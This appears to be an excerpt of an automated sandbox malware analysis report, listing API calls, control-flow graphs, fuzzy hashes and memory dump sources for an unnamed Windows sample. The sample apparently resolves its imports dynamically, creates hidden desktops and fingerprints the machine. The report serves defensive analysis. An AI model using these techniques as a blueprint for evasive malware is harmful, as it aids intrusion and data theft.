                            • GetProcAddress.KERNEL32(76210000,0101D9C0), ref: 006F6A79
                            • GetProcAddress.KERNEL32(76210000,010051E8), ref: 006F6A92
                            • GetProcAddress.KERNEL32(76210000,0101D9F0), ref: 006F6AAA
                            • GetProcAddress.KERNEL32(76210000,0101DB70), ref: 006F6AC2
                            • GetProcAddress.KERNEL32(76210000,01004FA8), ref: 006F6ADB
                            • GetProcAddress.KERNEL32(76210000,010050A8), ref: 006F6AF3
                            • LoadLibraryA.KERNEL32(0101DAE0,006F051F), ref: 006F6B05
                            • LoadLibraryA.KERNEL32(0101DB28), ref: 006F6B16
                            • LoadLibraryA.KERNEL32(0101DA08), ref: 006F6B28
                            • LoadLibraryA.KERNEL32(0101DB88), ref: 006F6B3A
                            • LoadLibraryA.KERNEL32(0101D990), ref: 006F6B4B
                            • LoadLibraryA.KERNEL32(0101DA98), ref: 006F6B5D
                            • LoadLibraryA.KERNEL32(0101D9A8), ref: 006F6B6F
                            • LoadLibraryA.KERNEL32(0101DA38), ref: 006F6B80
                            • GetProcAddress.KERNEL32(751E0000,01005028), ref: 006F6B9C
                            • GetProcAddress.KERNEL32(751E0000,0101DA50), ref: 006F6BB4
                            • GetProcAddress.KERNEL32(751E0000,01018C08), ref: 006F6BCD
                            • GetProcAddress.KERNEL32(751E0000,0101DBA0), ref: 006F6BE5
                            • GetProcAddress.KERNEL32(751E0000,01005108), ref: 006F6BFD
                            • GetProcAddress.KERNEL32(701C0000,0100A6D0), ref: 006F6C1D
                            • GetProcAddress.KERNEL32(701C0000,010056C8), ref: 006F6C35
                            • GetProcAddress.KERNEL32(701C0000,0100A810), ref: 006F6C4E
                            • GetProcAddress.KERNEL32(701C0000,0101D948), ref: 006F6C66
                            • GetProcAddress.KERNEL32(701C0000,0101D8E8), ref: 006F6C7E
                            • GetProcAddress.KERNEL32(701C0000,01005468), ref: 006F6C97
                            • GetProcAddress.KERNEL32(701C0000,010053C8), ref: 006F6CAF
                            • GetProcAddress.KERNEL32(701C0000,0101D918), ref: 006F6CC7
                            • GetProcAddress.KERNEL32(753A0000,01005428), ref: 006F6CE3
                            • GetProcAddress.KERNEL32(753A0000,01005688), ref: 006F6CFB
                            • GetProcAddress.KERNEL32(753A0000,0101DA68), ref: 006F6D14
                            • GetProcAddress.KERNEL32(753A0000,0101DA80), ref: 006F6D2C
                            • GetProcAddress.KERNEL32(753A0000,010055C8), ref: 006F6D44
                            • GetProcAddress.KERNEL32(76310000,0100A928), ref: 006F6D64
                            • GetProcAddress.KERNEL32(76310000,0100A450), ref: 006F6D7C
                            • GetProcAddress.KERNEL32(76310000,0101DAF8), ref: 006F6D95
                            • GetProcAddress.KERNEL32(76310000,01005608), ref: 006F6DAD
                            • GetProcAddress.KERNEL32(76310000,01005488), ref: 006F6DC5
                            • GetProcAddress.KERNEL32(76310000,0100A7C0), ref: 006F6DDE
                            • GetProcAddress.KERNEL32(76910000,0101DB10), ref: 006F6DFE
                            • GetProcAddress.KERNEL32(76910000,01005448), ref: 006F6E16
                            • GetProcAddress.KERNEL32(76910000,01018AA8), ref: 006F6E2F
                            • GetProcAddress.KERNEL32(76910000,0101D960), ref: 006F6E47
                            • GetProcAddress.KERNEL32(76910000,0101D900), ref: 006F6E5F
                            • GetProcAddress.KERNEL32(76910000,01005628), ref: 006F6E78
                            • GetProcAddress.KERNEL32(76910000,01005348), ref: 006F6E90
                            • GetProcAddress.KERNEL32(76910000,0101DAB0), ref: 006F6EA8
                            • GetProcAddress.KERNEL32(76910000,0101DB40), ref: 006F6EC1
                            • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 006F6ED7
                            • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 006F6EEE
                            • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 006F6F05
                            • GetProcAddress.KERNEL32(75B30000,01005508), ref: 006F6F21
                            • GetProcAddress.KERNEL32(75B30000,0101DAC8), ref: 006F6F39
                            • GetProcAddress.KERNEL32(75B30000,0101DB58), ref: 006F6F52
                            • GetProcAddress.KERNEL32(75B30000,0101DBB8), ref: 006F6F6A
                            • GetProcAddress.KERNEL32(75B30000,0101D978), ref: 006F6F82
                            • GetProcAddress.KERNEL32(75670000,01005648), ref: 006F6F9E
                            • GetProcAddress.KERNEL32(75670000,010053E8), ref: 006F6FB6
                            • GetProcAddress.KERNEL32(76AC0000,010056A8), ref: 006F6FD2
                            • GetProcAddress.KERNEL32(76AC0000,0101D8D0), ref: 006F6FEA
                            • GetProcAddress.KERNEL32(6F4E0000,010055E8), ref: 006F700A
                            • GetProcAddress.KERNEL32(6F4E0000,010056E8), ref: 006F7022
                            • GetProcAddress.KERNEL32(6F4E0000,01005408), ref: 006F703B
                            • GetProcAddress.KERNEL32(6F4E0000,0101DD50), ref: 006F7053
                            • GetProcAddress.KERNEL32(6F4E0000,01005668), ref: 006F706B
                            • GetProcAddress.KERNEL32(6F4E0000,01005368), ref: 006F7084
                            • GetProcAddress.KERNEL32(6F4E0000,010054A8), ref: 006F709C
                            • GetProcAddress.KERNEL32(6F4E0000,010054C8), ref: 006F70B4
                            • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 006F70CB
                            • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 006F70E2
                            • GetProcAddress.KERNEL32(75AE0000,0101DC00), ref: 006F70FE
                            • GetProcAddress.KERNEL32(75AE0000,01018AC8), ref: 006F7116
                            • GetProcAddress.KERNEL32(75AE0000,0101DBE8), ref: 006F712F
                            • GetProcAddress.KERNEL32(75AE0000,0101DDB0), ref: 006F7147
                            • GetProcAddress.KERNEL32(76300000,01005388), ref: 006F7163
                            • GetProcAddress.KERNEL32(6D3D0000,0101DC78), ref: 006F717F
                            • GetProcAddress.KERNEL32(6D3D0000,010053A8), ref: 006F7197
                            • GetProcAddress.KERNEL32(6D3D0000,0101DD38), ref: 006F71B0
                            • GetProcAddress.KERNEL32(6D3D0000,0101DEA0), ref: 006F71C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                            • API String ID: 2238633743-3468015613
                            • Opcode ID: 6ce9c791d120a0a8e381e02fe90690436c9f7d13018c75d30d360691edd72a71
                            • Instruction ID: b08a321fde691686ff4f6701d0f1767cbee50e7ab011b8e5b5cfddbf919b7b93
                            • Opcode Fuzzy Hash: 6ce9c791d120a0a8e381e02fe90690436c9f7d13018c75d30d360691edd72a71
                            • Instruction Fuzzy Hash: B2625EB563C201EFD754DF64EC88A2737BAF7897453108919EA96C3362DB74A840FB60
                            Function 006EF1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(006FCFEC), ref: 006EF1D5
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EF1F1
                            • lstrlen.KERNEL32(006FCFEC), ref: 006EF1FC
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EF215
                            • lstrlen.KERNEL32(006FCFEC), ref: 006EF220
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EF239
                            • lstrcpy.KERNEL32(00000000,00704FA0), ref: 006EF25E
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EF28C
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EF2C0
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EF2F0
                            • lstrlen.KERNEL32(01005148), ref: 006EF315
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 9cb9364c8e1ece1e604a5a7bb9a8c3d1825251d9ce8af2af8f99752aa51e1f43
                            • Instruction ID: ea6c2f371e703fd763c92ebfa0777383d0b158bd90461d6f50c99ee88b393965
                            • Opcode Fuzzy Hash: 9cb9364c8e1ece1e604a5a7bb9a8c3d1825251d9ce8af2af8f99752aa51e1f43
                            • Instruction Fuzzy Hash: 70A27070A16346DFCB60DF66D958A9AB7F6AF44310F18807AE849DB362DB31DC42CB50
                            Function 006EFFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F0013
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F00BD
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F00E1
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F00EC
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F0110
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F011B
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F013F
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F015A
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F0189
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F0194
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F01C3
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F01CE
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F0206
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F0250
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F0288
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F059B
                            • lstrlen.KERNEL32(01005008), ref: 006F05AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F05D7
                            • lstrcat.KERNEL32(00000000,?), ref: 006F05E3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F060E
                            • lstrlen.KERNEL32(0101F508), ref: 006F0625
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F064C
                            • lstrcat.KERNEL32(00000000,?), ref: 006F0658
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F0681
                            • lstrlen.KERNEL32(01005068), ref: 006F0698
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F06C9
                            • lstrcat.KERNEL32(00000000,?), ref: 006F06D5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F0706
                            • lstrcpy.KERNEL32(00000000,01018AD8), ref: 006F074B
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1557
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1579
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D159B
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D15FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F077F
                            • lstrcpy.KERNEL32(00000000,0101F5C8), ref: 006F07E7
                            • lstrcpy.KERNEL32(00000000,010189E8), ref: 006F0858
                            • lstrcpy.KERNEL32(00000000,fplugins), ref: 006F08CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F0928
                            • lstrcpy.KERNEL32(00000000,010188F8), ref: 006F09F8
                              • Part of subcall function 006D24E0: lstrcpy.KERNEL32(00000000,?), ref: 006D2528
                              • Part of subcall function 006D24E0: lstrcpy.KERNEL32(00000000,?), ref: 006D254E
                              • Part of subcall function 006D24E0: lstrcpy.KERNEL32(00000000,?), ref: 006D2577
                            • lstrcpy.KERNEL32(00000000,01018A28), ref: 006F0ACE
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F0B81
                            • lstrcpy.KERNEL32(00000000,01018A28), ref: 006F0D58
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID: fplugins
                            • API String ID: 2500673778-38756186
                            • Opcode ID: c11abbbc1b40d87df4d2d982a57833049faca8943e9867a9b37750cb25acea97
                            • Instruction ID: a309b390eda2cb7e23f2ec7e1de3ea1ca6c6a3ac86d8ce63602e647680169f7d
                            • Opcode Fuzzy Hash: c11abbbc1b40d87df4d2d982a57833049faca8943e9867a9b37750cb25acea97
                            • Instruction Fuzzy Hash: 80E26B70A05345CFD774DF29C488BAAB7E2BF89314F58856EE58D8B362DB319841CB42
                            Function 006EF2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(01005148), ref: 006EF315
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EF3A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EF3C7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EF47B
                            • lstrcpy.KERNEL32(00000000,01005148), ref: 006EF4BB
                            • lstrcpy.KERNEL32(00000000,01018BD8), ref: 006EF4EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EF59E
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006EF61C
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EF64C
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EF69A
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 006EF718
                            • lstrlen.KERNEL32(01018BC8), ref: 006EF746
                            • lstrcpy.KERNEL32(00000000,01018BC8), ref: 006EF771
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EF793
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EF7E4
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 006EFA32
                            • lstrlen.KERNEL32(01018BF8), ref: 006EFA60
                            • lstrcpy.KERNEL32(00000000,01018BF8), ref: 006EFA8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EFAAD
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EFAFE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 25c10eeacb573844a90a598578981a169f9445ff27901d82aa202c75ef9de778
                            • Instruction ID: fc7e1b149ad231c6474d61d897ab799785a5111e4a5e15dc9f024671e5924242
                            • Opcode Fuzzy Hash: 25c10eeacb573844a90a598578981a169f9445ff27901d82aa202c75ef9de778
                            • Instruction Fuzzy Hash: 3BF12F70A16342CFDB64CF6AD894A96B7F6BF44314B1981BED4099B3A2E731DC42CB50
                            Function 006E8CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2721 6e8ca0-6e8cc4 StrCmpCA 2722 6e8ccd-6e8ce6 2721->2722 2723 6e8cc6-6e8cc7 ExitProcess 2721->2723 2725 6e8cec-6e8cf1 2722->2725 2726 6e8ee2-6e8eef call 6d2a20 2722->2726 2727 6e8cf6-6e8cf9 2725->2727 2729 6e8cff 2727->2729 2730 6e8ec3-6e8edc 2727->2730 2732 6e8e6f-6e8e7d StrCmpCA 2729->2732 2733 6e8e88-6e8e9a lstrlen 2729->2733 2734 6e8d06-6e8d15 lstrlen 2729->2734 2735 6e8d84-6e8d92 StrCmpCA 2729->2735 2736 6e8da4-6e8db8 StrCmpCA 2729->2736 2737 6e8dbd-6e8dcb StrCmpCA 2729->2737 2738 6e8ddd-6e8deb StrCmpCA 2729->2738 2739 6e8dfd-6e8e0b StrCmpCA 2729->2739 2740 6e8e1d-6e8e2b StrCmpCA 2729->2740 2741 6e8e3d-6e8e4b StrCmpCA 2729->2741 2742 6e8d5a-6e8d69 lstrlen 2729->2742 2743 6e8e56-6e8e64 StrCmpCA 2729->2743 2744 6e8d30-6e8d3f lstrlen 2729->2744 2730->2726 2766 6e8cf3 2730->2766 2732->2730 2757 6e8e7f-6e8e86 2732->2757 2758 6e8e9c-6e8ea1 call 6d2a20 2733->2758 2759 6e8ea4-6e8eb0 call 6d2930 2733->2759 2753 6e8d1f-6e8d2b call 6d2930 2734->2753 2754 6e8d17-6e8d1c call 6d2a20 2734->2754 2735->2730 2748 6e8d98-6e8d9f 2735->2748 2736->2730 2737->2730 2749 6e8dd1-6e8dd8 2737->2749 2738->2730 2750 6e8df1-6e8df8 2738->2750 2739->2730 2751 6e8e11-6e8e18 2739->2751 2740->2730 2752 6e8e31-6e8e38 2740->2752 2741->2730 2755 6e8e4d-6e8e54 2741->2755 2745 6e8d6b-6e8d70 call 6d2a20 2742->2745 2746 6e8d73-6e8d7f call 6d2930 2742->2746 2743->2730 2756 6e8e66-6e8e6d 2743->2756 2760 6e8d49-6e8d55 call 6d2930 2744->2760 2761 6e8d41-6e8d46 call 6d2a20 2744->2761 2745->2746 2779 6e8eb3-6e8eb5 2746->2779 2748->2730 2749->2730 2750->2730 2751->2730 2752->2730 2753->2779 2754->2753 2755->2730 2756->2730 2757->2730 2758->2759 2759->2779 2760->2779 2761->2760 2766->2727 2779->2730 2780 6e8eb7-6e8eb9 2779->2780 2780->2730 2781 6e8ebb-6e8ebd lstrcpy 2780->2781 2781->2730
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 55455e64aa2324fc5429161f9c2a7861b8b25638e3cd1202f7306cf910321602
                            • Instruction ID: 22965c71b78ff1298bf707ee59d7e2e0826366e84bf966c9ffb4ff622a84263b
                            • Opcode Fuzzy Hash: 55455e64aa2324fc5429161f9c2a7861b8b25638e3cd1202f7306cf910321602
                            • Instruction Fuzzy Hash: 4051BFB0A09782EFD720DF76DC84A6B7BF6BF14700B10081DE58AD7662DB78D4429B20
                            Function 006F2740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2782 6f2740-6f2783 GetWindowsDirectoryA 2783 6f278c-6f27ea GetVolumeInformationA 2782->2783 2784 6f2785 2782->2784 2785 6f27ec-6f27f2 2783->2785 2784->2783 2786 6f2809-6f2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 6f27f4-6f2807 2785->2787 2788 6f2826-6f2844 wsprintfA 2786->2788 2789 6f2822-6f2824 2786->2789 2787->2785 2790 6f285b-6f2872 call 6f71e0 2788->2790 2789->2790
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 006F277B
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,006E93B6,00000000,00000000,00000000,00000000), ref: 006F27AC
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006F280F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F2816
                            • wsprintfA.USER32 ref: 006F283B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
